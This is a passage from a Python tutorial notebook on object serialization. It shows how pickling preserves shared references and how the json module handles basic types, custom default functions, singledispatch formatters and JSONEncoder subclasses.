{'x': 10, 'y': {'a': 1, 'b': 2, 'c': 3}}


Now suppose we pickle our dictionaries to restore those values the next time around, but use the same code, expecting the same result:

In [40]:
d1 = {'a': 1, 'b': 2}
d2 = {'x': 10, 'y': d1}
d1_ser = pickle.dumps(d1)
d2_ser = pickle.dumps(d2)

# simulate exiting the program, or maybe just restarting the notebook
del d1
del d2

# load the data back up
d1 = pickle.loads(d1_ser)
d2 = pickle.loads(d2_ser)

# and continue processing as before
print(d1)
print(d2)
d1['c'] = 3
print(d1)
print(d2)

{'a': 1, 'b': 2}
{'x': 10, 'y': {'a': 1, 'b': 2}}
{'a': 1, 'b': 2, 'c': 3}
{'x': 10, 'y': {'a': 1, 'b': 2}}


So just remember that as soon as you pickle a dictionary, whatever object references it had to another object is essentially lost - just as if you had done a deep copy first. It's a subtle point, but one that can easily lead to bugs if we're not careful.

However, the pickle module is relatively intelligent and will not re-pickle an object it has already pickled - which means that **relative** references are preserved.

Let's see an example of what I mean by this:

In [41]:
class Person:
    def __init__(self, name, age):
        self.name = name
        self.age = age
    
    def __eq__(self, other):
        return self.name == other.name and self.age == other.age
    
    def __repr__(self):
        return f'Person(name={self.name}, age={self.age})'

In [42]:
john = Person('John Cleese', 79)
eric = Person('Eric Idle', 75)
michael = Person('Michael Palin', 75)

In [43]:
parrot_sketch = {
    "title": "Parrot Sketch",
    "actors": [john, michael]
}

ministry_sketch = {
    "title": "Ministry of Silly Walks",
    "actors": [john, michael]
}

joke_sketch = {
    "title": "Funniest Joke in the World",
    "actors": [eric, michael]
}

In [44]:
fan_favorites = {
    "user_1": [parrot_sketch, joke_sketch],
    "user_2": [parrot_sketch, ministry_sketch]
}

In [45]:
from pprint import pprint
pprint(fan_favorites)

{'user_1': [{'actors': [Person(name=John Cleese, age=79),
                        Person(name=Michael Palin, age=75)],
             'title': 'Parrot Sketch'},
            {'actors': [Person(name=Eric Idle, age=75),
                        Person(name=Michael Palin, age=75)],
             'title': 'Funniest Joke in the World'}],
 'user_2': [{'actors': [Person(name=John Cleese, age=79),
                        Person(name=Michael Palin, age=75)],
             'title': 'Parrot Sketch'},
            {'actors': [Person(name=John Cleese, age=79),
                        Person(name=Michael Palin, age=75)],
             'title': 'Ministry of Silly Walks'}]}


As you can see we have some shared references, for example:

In [46]:
fan_favorites['user_1'][0] is fan_favorites['user_2'][0]

True

Let's store the id of the `parrot_sketch` for later reference:

In [47]:
parrot_id_original = id(parrot_sketch)

Now let's pickle and unpickle this object:

In [48]:
ser = pickle.dumps(fan_favorites)

In [49]:
new_fan_favorites = pickle.loads(ser)

In [50]:
fan_favorites == new_fan_favorites

True

And let's look at the `id` of the parrot_sketch object in our new dictionary compared to the original one:

In [51]:
id(fan_favorites['user_1'][0]), id(new_fan_favorites['user_1'][0])

(4554999848, 4555001288)

As expected the id's differ - but the objects are equal:

In [52]:
fan_favorites['user_1'][0] == new_fan_favorites['user_1'][0]

True

But now let's look at the parrot sketch that is in both `user_1` and `user_2` - remember that originally the objects were identical (`is`):

In [53]:
fan_favorites['user_1'][0] is fan_favorites['user_2'][0]

True

and with our new object:

In [54]:
new_fan_favorites['user_1'][0] is new_fan_favorites['user_2'][0]

True

As you can see the **relative** relationship between objects that were pickled is **preserved**.

And that's all I'm really going to say about pickling objects in Python. Instead I'm going to focus more on what is probably a more relevant topic to many of you - JSON serialization/deserialization.

##  JSON Serialization

As we saw in the lecture, JSON is an extremely popular format for data interchange. Unlike pickling it is safe, because JSON data is basically just text. It's human readable too, which is a plus.

There are other formats too, such as XML - but XML does not translate directly to Python dictionaries like JSON does. JSON is a far more natural fit with Python - in fact, when we view the contents of a Python dictionary it reminds us of JSON.

In [1]:
d = {
    "name": {
        "first": "...",
        "last": "..."
    },
    "contact": {
        "phone": [
            {"type": "...", "number": "..."},
            {"type": "...", "number": "..."},
            {"type": "...", "number": "..."},
        ],
        "email": ["...", "...", "..."]
    },
    "address": {
        "line1": "...",
        "line2": "...",
        "city": "...",
        "country": "..."
    }
}

This is a standard Python dictionary, but if you look at the format, it is also technically JSON.

A JSON object contains key/value pairs, nested objects and arrays - just like a Python dictionary. 

The big difference is that JSON is basically just one big string, while a Python dictionary is an object containing other objects.

So the big question when we want to "convert" (serialize) a Python object to JSON is how to **represent** Python objects as **strings**.

Conversely, if we want to load a JSON object into a Python dictionary, how do we "convert" (deserialize) the JSON value strings into a Python object.

By the way this concept of serializing/deserializing is also often called **marshalling**.

JSON has just a few data types it supports:

* **Strings**: must be delimited by double quotes
* **Booleans**: the values `true` and `false`
* **Numbers**: can be integers, or floats (including exponential notation, `1.3E2` for example), but are all considered floats in the standard
* **Arrays**: an **ordered** collection of zero or more items of any valid JSON type
* **Objects**: an **unordered** collection of `key:value` pairs - the keys must be strings (so delimited by double quotes), and the values can be any valid JSON type.
* **NULL**: a null object, denoted by `null` and equivalent to `None` in Python.

This means that the data types supported by JSON are relatively limited - but it turns out, as we'll see later, that it's not really a limitation.

Any object can be serialized into a string (think of the `__repr__` method we've used often throughout this course) - in fact, any piece of information in your computer is a series of bits, as are characters - so theoretically any piece of information can be represented using characters. We'll come back to this in a later video. For now, we're going to stick with the basic data types supported by JSON and see what Python provides us for marshalling JSON.

We are going to use the `json` module:

In [2]:
import json

In Python, serializing a dictionary to JSON is done using the `dump` and `dumps` functions - they are just variants of the same thing - `dumps` serializes to a string, while `dump` writes the serialization to a file (or more accurately, a stream).

Similarly, the `load` and `loads` functions are used to deserialize JSON into a dictionary.

Let's see a quick example first:

In [3]:
d1 = {"a": 100, "b": 200}

In [4]:
d1_json = json.dumps(d1)

In [5]:
d1_json, type(d1_json)

('{"a": 100, "b": 200}', str)

By the way, we can obtain a better looking JSON string by specifying an indent for the `dump` or `dumps` functions:

In [6]:
print(json.dumps(d1, indent=2))

{
  "a": 100,
  "b": 200
}


And we can deserialize the JSON string:

In [7]:
d2 = json.loads(d1_json)

In [8]:
d2, type(d2)

({'a': 100, 'b': 200}, dict)

In [9]:
d1 == d2

True

In fact, the original dictionary and the new one are equal.

#### Caveat!

There is a big caveat here. In Python, keys can be any hashable object. But remember that in JSON keys must be strings!

In [10]:
d1 = {1: 100, 2: 200}

In [11]:
d1_json = json.dumps(d1)

In [12]:
d1_json

'{"1": 100, "2": 200}'

Notice how the keys are now strings in the JSON "object". And when we deserialize:

In [13]:
d2 = json.loads(d1_json)

In [14]:
print(d1)
print(d2)

{1: 100, 2: 200}
{'1': 100, '2': 200}


As you can see our keys are now strings! So be careful, it is **not** true in general that `d == loads(dumps(d))`

Let's just see a few more examples that use the various JSON data types. I'll start with a JSON string this time:

In [15]:
d_json = '''
{
    "name": "John Cleese",
    "age": 82,
    "height": 1.96,
    "walksFunny": true,
    "sketches": [
        {
        "title": "Dead Parrot",
        "costars": ["Michael Palin"]
        },
        {
        "title": "Ministry of Silly Walks",
        "costars": ["Michael Palin", "Terry Jones"]
        }
    ],
    "boring": null    
}
'''

Let's deserialize this JSON string:

In [16]:
d = json.loads(d_json)

In [17]:
print(d)

{'name': 'John Cleese', 'age': 82, 'height': 1.96, 'walksFunny': True, 'sketches': [{'title': 'Dead Parrot', 'costars': ['Michael Palin']}, {'title': 'Ministry of Silly Walks', 'costars': ['Michael Palin', 'Terry Jones']}], 'boring': None}


In [18]:
d

{'name': 'John Cleese',
 'age': 82,
 'height': 1.96,
 'walksFunny': True,
 'sketches': [{'title': 'Dead Parrot', 'costars': ['Michael Palin']},
  {'title': 'Ministry of Silly Walks',
   'costars': ['Michael Palin', 'Terry Jones']}],
 'boring': None}

**Important**: The order of the keys *appears* preserved - but JSON objects are an **unordered** collection, so there is no guarantee of this - do not rely on it.

Let's see the various data types in our dictionary:

In [19]:
print(d['age'], type(d['age']))
print(d['height'], type(d['height']))
print(d['boring'], type(d['boring']))
print(d['sketches'], type(d['sketches']))
print(d['walksFunny'], type(d['walksFunny']))
print(d['sketches'][0], type(d['sketches'][0]))

82 <class 'int'>
1.96 <class 'float'>
None <class 'NoneType'>
[{'title': 'Dead Parrot', 'costars': ['Michael Palin']}, {'title': 'Ministry of Silly Walks', 'costars': ['Michael Palin', 'Terry Jones']}] <class 'list'>
True <class 'bool'>
{'title': 'Dead Parrot', 'costars': ['Michael Palin']} <class 'dict'>


As you can see the JSON `array` was serialized into a `list`, `true` was serialized into a `bool`, integer looking values into `int`, float looking values into `float` and sub-objects into `dict`.
As you can see deserializing JSON objects into Python is very straightforward and intuitive.

Let's look at tuples, and see serializing those work:

In [20]:
d = {'a': (1, 2, 3)}

In [21]:
json.dumps(d)

'{"a": [1, 2, 3]}'

So Python tuples are serialized into JSON lists - which again means that if we deserialize the JSON we will not get our exact object back:

In [22]:
json.loads(json.dumps(d))

{'a': [1, 2, 3]}

Of course, JSON does not have a notion of tuples as a data type, so this will not work:

In [23]:
bad_json = '''
    {"a": (1, 2, 3)}
'''

In [24]:
json.loads(bad_json)

JSONDecodeError: Expecting value: line 2 column 11 (char 11)

We get a `JSONDecodeError` exception. And that's an exception you'll run across quite a bit as you work with JSON data and Python objects!

So, Python was able to serialize a tuple by making it into a JSON array - but what about other data types - like Decimals, Fractions, Complex Numbers, Sets, etc?

In [25]:
from decimal import Decimal
json.dumps({'a': Decimal('0.5')})

TypeError: Object of type 'Decimal' is not JSON serializable

So `Decimal` objects are not serializable. Let's see the others as well:

In [26]:
try:
    json.dumps({"a": 1+1j})
except TypeError as ex:
    print(ex)

Object of type 'complex' is not JSON serializable


In [27]:
try:
    json.dumps({"a": {1, 2, 3}})
except TypeError as ex:
    print(ex)

Object of type 'set' is not JSON serializable


Now we could get around that problem by looking at the string representation of those objects:

In [28]:
str(Decimal(0.5))

'0.5'

In [29]:
json.dumps({"a": str(Decimal(0.5))})

'{"a": "0.5"}'

But as you can see from the JSON, when we read that data back, we will get the **string** `0.5` back, not even a float!

How about our own objects? As long as they have a string representation we should be fine, or will we?

In [30]:
class Person:
    def __init__(self, name, age):
        self.name = name
        self.age = age
    
    def __repr__(self):
        return f'Person(name={self.name}, age={self.age})'

In [31]:
p = Person('John', 82)

In [32]:
p

Person(name=John, age=82)

In [33]:
json.dumps({"john": p})

TypeError: Object of type 'Person' is not JSON serializable

So no luck there either. One approach is to write a custom JSON serializer in our class itself, and use that when we serialize the object:

In [34]:
class Person:
    def __init__(self, name, age):
        self.name = name
        self.age = age
    
    def __repr__(self):
        return f'Person(name={self.name}, age={self.age})'
    
    def toJSON(self):
        return dict(name=self.name, age=self.age)

In [35]:
p = Person('John', 82)

In [36]:
p.toJSON()

{'name': 'John', 'age': 82}

And now we can serialize it as follows:

In [37]:
print(json.dumps({"john": p.toJSON()}, indent=2))

{
  "john": {
    "name": "John",
    "age": 82
  }
}


In fact, often we can make our life a little easier by using the `vars` function (or the `__dict__` attribute) to return a dictionary of our object attributes:

In [38]:
vars(p)

{'name': 'John', 'age': 82}

In [39]:
p.__dict__

{'name': 'John', 'age': 82}

In [40]:
class Person:
    def __init__(self, name, age):
        self.name = name
        self.age = age
    
    def __repr__(self):
        return f'Person(name={self.name}, age={self.age})'
    
    def toJSON(self):
        return vars(self)

In [41]:
json.dumps(dict(john=p.toJSON()))

'{"john": {"name": "John", "age": 82}}'

How about dealing with sets, where we do not control the class definition:

In [42]:
s = {1, 2, 3}

We can't use the string representation (it has curly braces), and there's nothing else really handy - but we could just convert it to a list:

In [43]:
json.dumps(dict(a=list({1, 2, 3})))

'{"a": [1, 2, 3]}'

There are a couple of glaring issues at this point:
1. we have to remember to call `.toJSON()` for our custom objects
2. what about built-in or standard types like sets, or dates? use built-in or write custom functions to convert and call them every time?

There has to be a better way... !

##  Custom JSON Serialization

As we saw in the previous video, certain data types cannot be serialized to JSON using Python's defaults. 
Here's a simple example of this:

In [1]:
from datetime import datetime

In [2]:
current = datetime.utcnow()

In [3]:
current

datetime.datetime(2018, 12, 29, 22, 26, 35, 671836)

As we can see, this is a `datetime` object.

Now let's try to serialize it to JSON:

In [4]:
import json

In [5]:
json.dumps(current)

TypeError: Object of type 'datetime' is not JSON serializable

As we can see Python raises a `TypeError` exception, stating that `datetime` objects are not JSON serializable.

So, we'll need to come up with our own serialization format.

For datetimes, the most common format is the **ISO 8601** format - you can read up more about it here (https://en.wikipedia.org/wiki/ISO_8601), but basically the format is:

*YYYY-MM-DD* **T** *HH:MM:SS*

There are some variations for encoding timezones, but to keep things simple I am going to use timezone naive timestamps, and just use UTC everywhere.

We could use Python's string representation for datetimes:

In [6]:
str(current)

'2018-12-29 22:26:35.671836'

but this is not quite ISO-8601. We could write a custom formatter ourselves:

In [7]:
def format_iso(dt):
    return dt.strftime('%Y-%m-%dT%H:%M:%S')

(If you want more info and options on date and time formatting/parsing using `strftime` and `strptime`, which essentially pass through to their `C` counterparts, you can see the Python docs here: https://docs.python.org/3/library/datetime.html#strftime-strptime-behavior)

In [8]:
format_iso(current)

'2018-12-29T22:26:35'

But Python actually provides us a function to do the same:

In [9]:
current.isoformat()

'2018-12-29T22:26:35.671836'

This is almost identical to our custom representation, but also includes fractional seconds. If you don't want fractional seconds in your representation, then you'll have to write some custom code like the one above.
I'm just going to use Python's ISO-8601 representation.
And now let's serialize our `datetime` object to JSON:

In [10]:
log_record = {'time': datetime.utcnow().isoformat(), 'message': 'testing'}

In [11]:
json.dumps(log_record)

'{"time": "2018-12-29T22:26:42.083020", "message": "testing"}'

OK, this works, but this is far from ideal. Normally, our dictionary will contain the `datetime` object, not it's string representation.

For example, in the example I showed above, our record would likely be:

In [12]:
log_record = {'time': datetime.utcnow(), 'message': 'testing'}

The problem is that `log_record` is now not JSON serializable!

What we have to do is write custom code to replace non-JSON serializable objects in our dictionary with custom representations. This can quickly become tedious and unmanageable if we deal with many dictionaries, and arbitrary structures.

Fortunately, Python's `dump` and `dumps` functions have some ways for us to define general serializations for non-standard JSON objects.

The simplest way is to specify a function that `dump`/`dumps` will call when it encounters something it cannot serialize:

In [13]:
def format_iso(dt):
    return dt.isoformat()

In [14]:
json.dumps(log_record, default=format_iso)

'{"time": "2018-12-29T22:26:42.532485", "message": "testing"}'

This will work even if we have more than one date in our dictionary:

In [15]:
log_record = {
    'time1': datetime.utcnow(),
    'time2': datetime.utcnow(),
    'message': 'Testing...'
}

In [16]:
json.dumps(log_record, default=format_iso)

'{"time1": "2018-12-29T22:26:43.296170", "time2": "2018-12-29T22:26:43.296171", "message": "Testing..."}'

So this works, but what happens if we introduce another non-serializable object:

In [17]:
log_record = {
    'time': datetime.utcnow(),
    'message': 'Testing...',
    'other': {'a', 'b', 'c'}
}

In [18]:
json.dumps(log_record, default=format_iso)

AttributeError: 'set' object has no attribute 'isoformat'

As you can see, Python encountered that `set`, and therefore called the `default` callable - but that callable was not designed to handle sets, and so we end up with an exception in the `format_iso` callable instead.

We can remedy this by essentially adding code to our function to make it handle various data types. Essentially creating a dispatcher - this should remind you of the single-dispatch generic function decorator available in the `functools` module which we discussed in an earlier part of this series. You can also view more info about it here: https://docs.python.org/3/library/functools.html#functools.singledispatch


Let's first write it without the decorator to make sure we have our code correct:

In [19]:
def custom_json_formatter(arg):
    if isinstance(arg, datetime):
        return arg.isoformat()
    elif isinstance(arg, set):
        return list(arg)

In [20]:
json.dumps(log_record, default=custom_json_formatter)

'{"time": "2018-12-29T22:26:43.760863", "message": "Testing...", "other": ["c", "a", "b"]}'

To make things a little more interesting, let's throw in a custom object as well:

In [21]:
class Person:
    def __init__(self, name, age):
        self.name = name
        self.age = age
        self.create_dt = datetime.utcnow()
        
    def __repr__(self):
        return f'Person(name={self.name}, age={self.age})'
    
    def toJSON(self):
        return {
            'name': self.name,
            'age': self.age,
            'create_dt': self.create_dt.isoformat()
        }

In [22]:
p = Person('John', 82)
print(p)
print(p.toJSON())

Person(name=John, age=82)
{'name': 'John', 'age': 82, 'create_dt': '2018-12-29T22:26:45.066252'}


And we modify our custom JSON formatter as follows:

In [23]:
def custom_json_formatter(arg):
    if isinstance(arg, datetime):
        return arg.isoformat()
    elif isinstance(arg, set):
        return list(arg)
    elif isinstance(arg, Person):
        return arg.toJSON()

We can now serialize a more complex object:

In [24]:
log_record = dict(time=datetime.utcnow(),
                  message='Created new person record',
                  person=p)

In [25]:
json.dumps(log_record, default=custom_json_formatter)

'{"time": "2018-12-29T22:26:45.769929", "message": "Created new person record", "person": {"name": "John", "age": 82, "create_dt": "2018-12-29T22:26:45.066252"}}'

In [26]:
print(json.dumps(log_record, default=custom_json_formatter, indent=2))

{
  "time": "2018-12-29T22:26:45.769929",
  "message": "Created new person record",
  "person": {
    "name": "John",
    "age": 82,
    "create_dt": "2018-12-29T22:26:45.066252"
  }
}


One thing to note here is that for the `Person` class we returned a formatted string for the `created_dt` attribute. We don't actually need to do this - we can simply return a `datetime` object and let `custom_json_formatter` handle serializing the `datetime` object:

In [27]:
class Person:
    def __init__(self, name, age):
        self.name = name
        self.age = age
        self.create_dt = datetime.utcnow()
        
    def __repr__(self):
        return f'Person(name={self.name}, age={self.age})'
    
    def toJSON(self):
        return {
            'name': self.name,
            'age': self.age,
            'create_dt': self.create_dt
        }

In [28]:
p = Person('Monty', 100)

In [29]:
log_record = dict(time=datetime.utcnow(),
                  message='Created new person record',
                  person=p)

In [30]:
print(json.dumps(log_record, default=custom_json_formatter, indent=2))

{
  "time": "2018-12-29T22:26:47.029102",
  "message": "Created new person record",
  "person": {
    "name": "Monty",
    "age": 100,
    "create_dt": "2018-12-29T22:26:46.749022"
  }
}


In fact, we could simplify our class further by simply returning a dict of the attributes, since in this case we want to serialize everything as is.
But using the `toJSON` callable means we can customize exactly how we want out objects to be serialized.

So, if we weren't particular about the serialization we could do this:

In [31]:
class Person:
    def __init__(self, name, age):
        self.name = name
        self.age = age
        self.create_dt = datetime.utcnow()
        
    def __repr__(self):
        return f'Person(name={self.name}, age={self.age})'
    
    def toJSON(self):
        return vars(self)

In [32]:
p = Person('Python', 27)

In [33]:
p.toJSON()

{'name': 'Python',
 'age': 27,
 'create_dt': datetime.datetime(2018, 12, 29, 22, 26, 47, 973930)}

In [34]:
log_record['person'] = p
print(log_record)

{'time': datetime.datetime(2018, 12, 29, 22, 26, 47, 29102), 'message': 'Created new person record', 'person': Person(name=Python, age=27)}


In [35]:
print(json.dumps(log_record, default=custom_json_formatter, indent=2))

{
  "time": "2018-12-29T22:26:47.029102",
  "message": "Created new person record",
  "person": {
    "name": "Python",
    "age": 27,
    "create_dt": "2018-12-29T22:26:47.973930"
  }
}


In fact, we could use this approach in our custom formatter - if an object does not have a `toJSON` callable, we'll just use a dictionary of the attributes - it it has any, it might not (like a complex number or a set as examples), so we need to watch out for that as well.

In [36]:
'toJSON' in vars(Person)

True

In [37]:
def custom_json_formatter(arg):
    if isinstance(arg, datetime):
        return arg.isoformat()
    elif isinstance(arg, set):
        return list(arg)
    else:
        try:
            return arg.toJSON()
        except AttributeError:
            try:
                return vars(arg)
            except TypeError:
                return str(arg)

Let's create another custom class that does not have a `toJSON` method:

In [38]:
class Point:
    def __init__(self, x, y):
        self.x = x
        self.y = y
        
    def __repr__(self):
        return f'Point(x={self.x}, y={self.y})'

In [39]:
pt1 = Point(10, 10)

In [40]:
vars(pt1)

{'x': 10, 'y': 10}

In [41]:
log_record = dict(time=datetime.utcnow(),
                  message='Created new point',
                  point=pt1,
                  created_by=p)

In [42]:
log_record

{'time': datetime.datetime(2018, 12, 29, 22, 26, 50, 955039),
 'message': 'Created new point',
 'point': Point(x=10, y=10),
 'created_by': Person(name=Python, age=27)}

And we can now serialize it to JSON:

In [43]:
print(json.dumps(log_record, default=custom_json_formatter, indent=2))

{
  "time": "2018-12-29T22:26:50.955039",
  "message": "Created new point",
  "point": {
    "x": 10,
    "y": 10
  },
  "created_by": {
    "name": "Python",
    "age": 27,
    "create_dt": "2018-12-29T22:26:47.973930"
  }
}


So now, let's re-write our custom json formatter using the generic single dispatch decorator I mentioned earlier:

In [44]:
from functools import singledispatch

Our default approach is going to first try to use `toJSON`, if not it will try to use `vars`, and it that still fails we'll use the string representation, whatever that happens to be:

In [45]:
@singledispatch
def json_format(arg):
    print(arg)
    try:
        print('\ttrying to use toJSON...')
        return arg.toJSON()
    except AttributeError:
        print('\tfailed - trying to use vars...')
        try:
            return vars(arg)
        except TypeError:
            print('\tfailed - using string representation...')
            return str(arg)

And now we 'register' other data types:

In [46]:
@json_format.register(datetime)
def _(arg):
    return arg.isoformat()

In [47]:
@json_format.register(set)
def _(arg):
    return list(arg)

And we can now serialize just like before:

In [48]:
print(json.dumps(log_record, default=json_format, indent=2))

Point(x=10, y=10)
	trying to use toJSON...
	failed - trying to use vars...
Person(name=Python, age=27)
	trying to use toJSON...
{
  "time": "2018-12-29T22:26:50.955039",
  "message": "Created new point",
  "point": {
    "x": 10,
    "y": 10
  },
  "created_by": {
    "name": "Python",
    "age": 27,
    "create_dt": "2018-12-29T22:26:47.973930"
  }
}


Let's change our Person class to emit some custom JSON instead of just using `vars`:

In [49]:
class Person:
    def __init__(self, name, age):
        self.name = name
        self.age = age
        self.create_dt = datetime.utcnow()
        
    def __repr__(self):
        return f'Person(name={self.name}, age={self.age})'
    
    def toJSON(self):
        return dict(name=self.name)

In [50]:
p = Person('Python', 27)

In [51]:
log_record['created_by'] = p

In [52]:
print(json.dumps(log_record, default=json_format, indent=2))

Point(x=10, y=10)
	trying to use toJSON...
	failed - trying to use vars...
Person(name=Python, age=27)
	trying to use toJSON...
{
  "time": "2018-12-29T22:26:50.955039",
  "message": "Created new point",
  "point": {
    "x": 10,
    "y": 10
  },
  "created_by": {
    "name": "Python"
  }
}


The way we wrote our default formatter, means that we can now also represent other unexpected data types, but using each object's string representation. If that's not acceptable, we can either not do this and let a `TypeError` exception get generated, or register more custom formatters:

In [53]:
from decimal import Decimal
from fractions import Fraction

json.dumps(dict(a=1+1j, 
                b=Decimal('0.5'), 
                c=Fraction(1, 3),
                p=Person('Python', 27),
                pt=Point(0,0),
                time=datetime.utcnow()
               ), 
           default=json_format)

(1+1j)
	trying to use toJSON...
	failed - trying to use vars...
	failed - using string representation...
0.5
	trying to use toJSON...
	failed - trying to use vars...
	failed - using string representation...
1/3
	trying to use toJSON...
	failed - trying to use vars...
	failed - using string representation...
Person(name=Python, age=27)
	trying to use toJSON...
Point(x=0, y=0)
	trying to use toJSON...
	failed - trying to use vars...


'{"a": "(1+1j)", "b": "0.5", "c": "1/3", "p": {"name": "Python"}, "pt": {"x": 0, "y": 0}, "time": "2018-12-29T22:26:54.860340"}'

Now, suppose we don't want that default representation for `Decimals` - we want to serialize it in this form: `Decimal(0.5)`.

All we need to do is to register a new function to serialize `Decimal` types:

In [54]:
@json_format.register(Decimal)
def _(arg):
    return f'Decimal({str(arg)})'

In [55]:
json.dumps(dict(a=1+1j, 
                b=Decimal(0.5), 
                c=Fraction(1, 3),
                p=Person('Python', 27),
                pt = Point(0,0),
                time = datetime.utcnow()
               ), 
           default=json_format)

(1+1j)
	trying to use toJSON...
	failed - trying to use vars...
	failed - using string representation...
1/3
	trying to use toJSON...
	failed - trying to use vars...
	failed - using string representation...
Person(name=Python, age=27)
	trying to use toJSON...
Point(x=0, y=0)
	trying to use toJSON...
	failed - trying to use vars...


'{"a": "(1+1j)", "b": "Decimal(0.5)", "c": "1/3", "p": {"name": "Python"}, "pt": {"x": 0, "y": 0}, "time": "2018-12-29T22:26:55.491606"}'

One last example that clearly shows the `json_format` function gets called recursively when needed:

In [56]:
print(json.dumps(dict(pt = Point(Person('Python', 27), 2+2j)),
          default=json_format, indent=2))

Point(x=Person(name=Python, age=27), y=(2+2j))
	trying to use toJSON...
	failed - trying to use vars...
Person(name=Python, age=27)
	trying to use toJSON...
(2+2j)
	trying to use toJSON...
	failed - trying to use vars...
	failed - using string representation...
{
  "pt": {
    "x": {
      "name": "Python"
    },
    "y": "(2+2j)"
  }
}


##  Custom JSON Encoding using JSONEncoder

In the previous video, we saw how we were able to provide custom encodings using the `default` argument of the `dump`/`dumps` function.

But how does Python know how to encode the "standard" types, such as `str`, `int`, `float`, `list`, `dict`, etc?

It uses a special class - `JSONEncoder`.

This class supports the following encodings (see Python docs: https://docs.python.org/3/library/json.html#json.JSONEncoder)

|Python |JSON  |
|:----|:---|
| `dict` | object `{...}`|
| `list`, `tuple` | array `[...]` |
| `str`  | string `"..."`|
| `int`, `float` | number |
| `int` or `float` `Enums` | number |
| `bool` | `true` or `false` |
| `None` | `null` |

Anything beyond those Python types and we end up with a `TypeError` exception.

We can see how this class encodes objects by calling an instance of it directly:

In [1]:
import json

default_encoder = json.JSONEncoder()
default_encoder.encode([1, 2, 3])

'[1, 2, 3]'

And for non-supported objects:

In [2]:
default_encoder.encode(1+1j)

TypeError: Object of type 'complex' is not JSON serializable

We can actually extend this `JSONEncoder` class and override the `default` method. We can then add in support for whatever type we want to use, and pass any other types to the parent class to handle (either serialize the data or raise a `TypeError` exception). 

Let's just see a simple example first:

In [3]:
import json
from datetime import datetime

class CustomJSONEncoder(json.JSONEncoder):
    def default(self, arg):
        if isinstance(arg, datetime):
            return arg.isoformat()
        else:
            super().default(arg)

In [4]:
custom_encoder = CustomJSONEncoder()

In [5]:
custom_encoder.encode(True)

'true'

In [6]:
custom_encoder.encode(datetime.utcnow())

'"2018-12-29T22:27:19.863377"'

And we can now use this custom encoder by specifying it when we use `dump`/`dumps`:

In [7]:
json.dumps(dict(name='test', time=datetime.utcnow()), cls=CustomJSONEncoder)

'{"name": "test", "time": "2018-12-29T22:27:20.135841"}'

One thing to note is that for both the `default` approach, and the `cls` approach, our method / encoder will only be used for types that Python cannot already serialize on its own (strings, integers, lists, etc).

In [8]:
def custom_encoder(arg):
    print('Custom encoder called...')
    if isinstance(arg, str):
        return f'some string: {arg}'

Here we want to "override" `dumps` default encoding behavior for strings:

In [9]:
json.dumps({'name': 'Python'}, default=custom_encoder)

'{"name": "Python"}'

As you can see, we cannot do that - because the argument is a "recognized" type (`str`), Python does not even call our `custom_encoder` function.

And the same happens when we override the `default` method in our custom `JSONEncoder` class.

Let's look at the signature for `dumps`:

In [10]:
help(json.dumps)

Help on function dumps in module json:

dumps(obj, *, skipkeys=False, ensure_ascii=True, check_circular=True, allow_nan=True, cls=None, indent=None, separators=None, default=None, sort_keys=False, **kw)
    Serialize ``obj`` to a JSON formatted ``str``.
    
    If ``skipkeys`` is true then ``dict`` keys that are not basic types
    (``str``, ``int``, ``float``, ``bool``, ``None``) will be skipped
    instead of raising a ``TypeError``.
    
    If ``ensure_ascii`` is false, then the return value can contain non-ASCII
    characters if they appear in strings contained in ``obj``. Otherwise, all
    such characters are escaped in JSON strings.
    
    If ``check_circular`` is false, then the circular reference check
    for container types will be skipped and a circular reference will
    result in an ``OverflowError`` (or worse).
    
    If ``allow_nan`` is false, then it will be a ``ValueError`` to
    serialize out of range ``float`` values (``nan``, ``inf``, ``-inf``) in
    stric

And let's see the signature for `JSONEncoder`:

In [11]:
help(json.JSONEncoder)

Help on class JSONEncoder in module json.encoder:

class JSONEncoder(builtins.object)
 |  Extensible JSON <http://json.org> encoder for Python data structures.
 |  
 |  Supports the following objects and types by default:
 |  
 |  +-------------------+---------------+
 |  | Python            | JSON          |
 |  | dict              | object        |
 |  +-------------------+---------------+
 |  | list, tuple       | array         |
 |  +-------------------+---------------+
 |  | str               | string        |
 |  +-------------------+---------------+
 |  | int, float        | number        |
 |  +-------------------+---------------+
 |  | True              | true          |
 |  +-------------------+---------------+
 |  | False             | false         |
 |  +-------------------+---------------+
 |  | None              | null          |
 |  +-------------------+---------------+
 |  
 |  To extend this to recognize other objects, subclass and implement a
 |  ``.default()`` metho

Here we are particularly interested in the `__init__` method signature:

 `__init__(self, *, skipkeys=False, ensure_ascii=True, check_circular=True, allow_nan=True, sort_keys=False, indent=None, separators=None, default=None)`

`dumps(obj, *, skipkeys=False, ensure_ascii=True, check_circular=True, allow_nan=True, cls=None, indent=None, separators=None, default=None, sort_keys=False, **kw)`

In [12]:
d = {
    'a': float('inf'),
    'b': [1, 2, 3]
}

In [13]:
d

{'a': inf, 'b': [1, 2, 3]}

In [14]:
type(d['a'])

float

As you can see, that float is a special type of float - it represents + infinity.

Let's see if Python can encode that:

In [15]:
json.dumps(d)

'{"a": Infinity, "b": [1, 2, 3]}'

Yes, it does - but notice the output, `Infinity`. Technically this is not JSON... (see https://tools.ietf.org/html/rfc4627 Section 2.4)

So, if we want to be strict about this, and ensure we are not trying to serialize a value such as infinity, we would do this instead:

In [16]:
json.dumps(d, allow_nan=False)

ValueError: Out of range float values are not JSON compliant

And we get the desired result.

What about trying to encode an invalid key (from JSON's perspective)::

In [17]:
d = {10: "int", 10.5: "float", 1+1j: "complex"}

In [18]:
d

{10: 'int', 10.5: 'float', (1+1j): 'complex'}

These are all valid Python dictionary keys, but what happens with JSON encoding?

In [19]:
json.dumps(d)

TypeError: keys must be a string

As you can see we get an exception. We may want to simply ignore that exception and not include the offending key/value pair in our serialization:

In [20]:
json.dumps(d, skipkeys=True)

'{"10": "int", "10.5": "float"}'

And now we no longer get an exception, and the complex key was simply skipped.

We can even change how the serialization is rendered (which of course means we may no longer have actual JSON):

In [21]:
d = {
    'name': 'Python',
    'age': 27,
    'created_by': 'Guido van Rossum',
    'list': [1, 2, 3]
}

In [22]:
json.dumps(d)

'{"name": "Python", "age": 27, "created_by": "Guido van Rossum", "list": [1, 2, 3]}'

In [23]:
print(json.dumps(d, indent='---', separators=('', ' = ')))

{
---"name" = "Python"
---"age" = 27
---"created_by" = "Guido van Rossum"
---"list" = [
------1
------2
------3
---]
}


We can use this by the way, to create more compact JSON strings (uses less bytes):

In [24]:
print(json.dumps(d))

{"name": "Python", "age": 27, "created_by": "Guido van Rossum", "list": [1, 2, 3]}


vs

In [25]:
print(json.dumps(d, separators=(',', ':')))

